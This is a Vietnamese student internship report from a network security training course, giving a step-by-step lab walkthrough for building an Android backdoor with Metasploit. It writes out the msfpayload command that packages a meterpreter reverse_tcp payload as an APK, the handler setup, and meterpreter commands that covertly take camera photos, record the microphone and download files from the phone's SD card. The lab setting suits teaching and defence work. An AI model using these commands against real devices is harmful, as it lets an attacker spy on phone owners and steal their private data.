1. TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG & AN NINH MẠNG
QUỐC TẾ
ĐỀ TÀI :
NGHIÊN CỨU CÁC TROJAN, MALWARE
CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH
SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN
THOẠI SỬ DỤNG ANDROID VÀ GỬI RA
NGOÀI
BÁO CÁO TUẦN 3
GVHD: VÕ ĐỖ THẮNG
SVTH: TRẦN THANH THÔNG
MSSV: 1120168
2. BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi
ra ngoài
PHẦN 1: THỰC HIỆN TRÊN MẠNG LAN
1.1. Nghiên cứu và cài đặt Kali Linux trên VMware
1.2. Tạo mã độc trên Kali Linux xâm nhập Android
1.2.1. Tạo mã độc trên Kali Linux
Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi
máy android tải về và mở payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử
dụng máy ảo Kali Linux bằng Vmware, ta nên thiết lập phần Network như sau:
Bấm vào VM Settings... ở thanh lựa chọn của Vmware
Bấm vào Network Adapter và chọn Bridged: connection directly to the
Trang 1
physical network
3. BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi
ra ngoài
Bấm vào Edit => Virtual Network Editor...
Trên phần Bridge (connect VMs directly to the external network) chọn
Trang 2
adapter của máy thật
4. BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi
ra ngoài
Sau đây ta vào phần chính tạo backdoor và xâm nhập điều khiển android
Đầu tiên mở Terminal và gõ dòng lệnh
Msfpayload android/meterpreter/reverse_tcp lhost=192.168.126.130
lport=8080 R > /root/Desktop/hack.apk
Trang 3
5. BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi
ra ngoài
192.168.126.130 là địa chỉ IP của máy Kali, ta có thể sử dụng lệnh ifconfig
Trang 4
để xem IP của máy Kali
8080 là số port, có thể chọn port khác, không nên chọn các port thường sử
dụng
6. BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi
ra ngoài
Lệnh trên sẽ tạo ra 1 file hack.apk trên desktop của Kali, đây chính là một
Trang 5
Metasploit reverse tcp backdoor.
Tiếp theo, gõ lệnh msfconsole
Sau khi msfconsole load xong, ta tạo một handler để xử lí dữ liệu truyền về
bằng cách gõ lệnh sau:
7. BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi
ra ngoài
Trang 6
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.126.130 – nhập địa chỉ IP giống với khi tạo payload ở trên.
set lport 8080 – nhập port giống với port khi tạo payload ở trên.
Exploit
Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.
Thử với một máy Samsung Galaxy S3 giả lập, tải về hack.apk, cài đặt và
mở lên được giao diện như dưới, nhấp vào nút reverse_tcp
8. BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi
ra ngoài
Vậy là ta đã kết nối thành công tới máy Android này, ở msfconsole sẽ như
Trang 7
sau:
9. BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi
ra ngoài
Để xem thông tin về máy, nhập lệnh SysInfo
1.2.2. Thực hiện khai thác dữ liệu trong SDcard
Trang 8
a. Sử dụng camera
Để xem danh sách camera, nhập webcam_list
10. BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi
ra ngoài
Để chụp hình bằng camera, nhập webcam_snap x với x là ID của camera
xem ở danh sách camera ở phần trước. Ví dụ như sau:
File hình đã chụp từ camera của máy android là GBgAyecQ.jpg được lưu ở
Trang 9
/root của máy
b. Ghi âm
11. BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi
ra ngoài
Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về
Trang 10
máy
c. Lấy file từ SDcard
Để vào SDcard, nhập lệnh cd /sdcard và lệnh ls để xem danh sách file, thư
mục
12. BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi
ra ngoài
Ví dụ ở đây, ta tải file hack-1.apk trong thư mục download của SDcard
Trang 11
13. BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi
ra ngoài
Dùng lệnh cd /sdcard/Download để vào thư mục
Trang 12
14. BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi
ra ngoài
Như trên hình, ta thấy 2 file là hack-1.apk và hack.apk, để tải hack-1.apk
Trang 13
về máy, ta nhập lệnh
Download hack-1.apk
Và file này sẽ được tải về thư mục root của máy Kali
15. BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi
ra ngoài
Trang 14